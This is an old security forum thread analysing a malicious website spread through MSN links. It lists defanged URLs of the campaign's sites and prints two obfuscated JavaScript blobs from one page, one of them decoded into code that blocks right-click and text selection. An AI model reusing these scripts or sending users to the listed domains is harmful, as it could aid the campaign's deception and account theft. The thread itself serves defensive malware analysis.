Author Topic: MSN Spreaded MalWebsite  (Read 4374 times)

0 Members and 1 Guest are viewing this topic.

May 25, 2008, 06:55:19 am
Read 4374 times

Evilcry

  • Special Access
  • Jr. Member

  • Offline
  • *

  • 39
Hi,

Today moring I've received a link from an MSN Contact of mine, she was offline.

Code: [Select]
hxxp://checkdiz.info

at first analysis with Malzilla it reveals three other links

Code: [Select]
hxxp://checkdiz.info/indexx.php
hxxp://www.cpashield.com/abuse.html
hxxp://checkdiz.info/counter.php

indexx.php has a level of indirection to

Code: [Select]
hxxp://fileho5t.info/indexxx.php

counter.php leads to

Code: [Select]
hxxp://www.ipcounter.de/stats.php?u=50076309

and finally the most intersting cpashield.com/abuse.html contains obfuscated javascript code

Code: [Select]
<!--
jL0="0ucoc\\MIM",yU90="Iu\{\{\{\%\%ovf0N";0.1261199,nB73="0.7082915",yU90='\|\:T2B\ m\(8\?\$\*b\]AyX\"aOVt\.Y\-\_1qx\\\{\[l\niZI4\r3\=\!7uHv5JsCKPj\;QgR\+\`foM6w\/F\>\'rpN\<D9\^S\,\@\#dcWU\}\%LE\&nG0\~ekzh\)',jL0='\"u\>tc\`S\ \]I\_\&\{gholKDf\#LdkCXU\~\/z97y\'m\,\\8B\=\rRG\|\.iE\+n\n\%FJ\;1b\[saV\-36\)Aw\$O\(\!H2MNZ\*eqvPW4r\@T5\:Y\<Qx0\^pj\}\?';function lW4(uO49){"0u\%N\{\{I\{\\",l=uO49.length;'0k\+IBI\r0c',w='';while(l--)"0ucooc\;\{\{",o=jL0.indexOf(uO49.charAt(l)),'\~k\)0\~cc\+YX0c',w=(o==-1?uO49.charAt(l):yU90.charAt(o))+w;"0uoN0M\%\{\{",jL0=jL0.substring(1)+jL0.charAt(0),document.write(w);'0kZ\r\)Z\r\r\|'};lW4("2nW\(m\!L\`yD\<b\|Db\^\rJDiDnW\(m\!L\$\)l8t\r8\]\]U\;mV\ P\-W\|S\^\<LdDyy\?9V\|\<WLm\-\<\`XPS\ \?9\(\^L\|\(\<\`VDyn\^\@\;V\|\<WLm\-\<\`XSPS\ \?9P\-W\|S\^\<Ld\-\<W\-\<L\^\/LS\^\<\|\rXPS\;n\^L\>mS\^\-\|L\ KXSPS\ \?Ke\]xx\?\@\;XSPS\ \?\;\@P\-W\|S\^\<Ld\-\<W\-\<L\^\/LS\^\<\|\r\<\^\)\`w\|\<WLm\-\<\ K\(\^L\|\(\<\`VDyn\^K\?\;V\|\<WLm\-\<\`X\<PS\ \^\?9mV\ P\-W\|S\^\<LdyDo\^\(n\"\"\)m\<P\-\)dnmP\^\{D\(\?9mV\ \^d\)\}mW\}R\rU\?\(\^L\|\(\<\`VDyn\^\;\@\@\;mV\ P\-W\|S\^\<LdyDo\^\(n\?9P\-W\|S\^\<LdWD\!L\|\(\^\:i\^\<Ln\ \:i\^\<Ld3fr\*\:Mf4H\?\;P\-W\|S\^\<Ld\-\<S\-\|n\^P\-\)\<\rX\<PS\;\@\^yn\^9P\-W\|S\^\<Ld\-\<S\-\|n\^\|\!\rX\<PS\;\@\;S1Ux\rtEN\=\;\{fGE\r6EN8\;V\|\<WLm\-\<\`XP\)n\ \?9\)m\<P\-\)dnLDL\|n\`\r\`K\`K\;n\^L\>mS\^\-\|L\ KXP\)n\ \?KeUxx\?\;\@\;XP\)n\ \?\;mM\]N\r6xtU\;m48E\r\=8E8\;V\|\<WLm\-\<\`XPPn\ \?9mV\ P\-W\|S\^\<LdDyy\?9P\-W\|S\^\<Ld\-\<n\^y\^WLnLD\(L\rV\|\<WLm\-\<\`\ \?9\(\^L\|\(\<\`VDyn\^\@\;n\^L\>mS\^\-\|L\ KXPPn\ \?KeGxx\?\@\@\;XPPn\ \?\;b\+E\r8ENG\;mHUG\rNG\=G\;jltt\rtEN6\;yMGx\r\=G\=6\;p1tN\r8\]G\]\;jfN8\r\]\]\]x\;\~kx\rUG\=\]\;\;XymW\^\<n\^PXL\-X\rKF\^L\^\(\`\nDyyK\;2AnW\(m\!L\$")//-->

Which decoded became

Code: [Select]
wX42=4881;
if(document.all){
function _dm(){return false};
function _mdm(){
document.oncontextmenu=_dm;
setTimeout("_mdm()",800)};
_mdm();
}

document.oncontextmenu=new Function("return false");
function _ndm(e){
if(document.layers||window.sidebar){if(e.which!=1)return false;
 }
};

if(document.layers){
document.captureEvents(Event.MOUSEDOWN);
document.onmousedown=_ndm;
 }

else {
document.onmouseup=_ndm;
};

mQ10=2593;bO75=6594;

function _dws(){
window.status = " ";
setTimeout("_dws()",100);
};

_dws();
iD89=6021;
iW45=3454;
function _dds(){if(document.all){
document.onselectstart=function (){return false};
setTimeout("_dds()",700)}};_dds();
gJ5=4597;
iN17=9737;
zX22=2596;
lD70=3736;
kQ29=4878;
zO94=8880;
qY0=1738;
;_licensed_to_="Peter Call";

there is also another piece of obfuscated code

Code: [Select]
<script language="javascript">lW4("MGN\#\%tCJYS\?d\ \'SJ\@\`\:8\%SDXwwr\r\%wwNtNSKit6\:S\~k0St\!fQ\n\,d\,3Qf\'wwY2DSD\?ddH\>wwAAAkA\rk3\!\[wtswz\?d\ \'\~wNtNwz\?d\ \'\~Xd\!fQ\n\,d\,3Qf\'kWdWDO\=m\=mMGXXS\%\!pfdpWS3QSoH\!Sc\+qSc00\|SI\>c0\>0cSJ6SXXO\=m\=mM\?d\ \'O\=mSSSM\?pfWO\=mSSSSSSMd\,d\'pO\=mSSSSSSSSS\=mSSSSSSMwd\,d\'pO\=mSSSSSSM\ pdfSQf\ pRDxY2Ysot\#sDS43QdpQdRDo\!f4\?Q3H\?\,\'\,fS\+k\rDwO\=mSSSSSSM\ pdfSQf\ pRD\$\#s6ottYsDS43QdpQdRDo\!f4\?Q3H\?\,\'\,fS\+k\rDwO\=mSSSMw\?pfWO\=m\=mSSSMg3WlSg\[43\'3\!RDP\-\-\-\-\-\-DSdpzdRDP000000DS\'\,QjRDP0000\-\-DSE\'\,QjRDPI000I0DSf\'\,QjRDP\-\-0000DO\=m\=mSM4pQdp\!OMgOJ\'pf\npS\!pH3\!dSfQlS\np\!E\,4pSE\,3\'fd\,3Q\nSd3\>SMoS\?\!p\-RD\ f\,\'d3\>fg\.\npv4Hf\n\?\,p\'Wk43\ DOfg\.\npv4Hf\n\?\,p\'Wk43\ MwgOMwfOMw4pQdp\!O\=m\=mSSSMwg3WlO\=mMw\?d\ \'O\=m")

Regards,
Evilcry

Deep Root Never Freezes - Tolkien

May 25, 2008, 03:35:55 pm
Reply #1

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964

May 25, 2008, 04:09:29 pm
Reply #2

sowhat-x

  • Guest
Alive at the moment...
Quote
hxxp://very.c00l-stuff.com
hxxp://ch33se.info/indexxx.php
hxxp://m33tpoint.info/
hxxp://we1rd.info/indexxx.php
hxxp://m0bil3.info/indexxx.php
hxxp://mtracyruc.p4rtyp1cs.info/indexx.php

And it seems like they're also after MySpace accounts...
Quote
hxxp://maxcomments.com/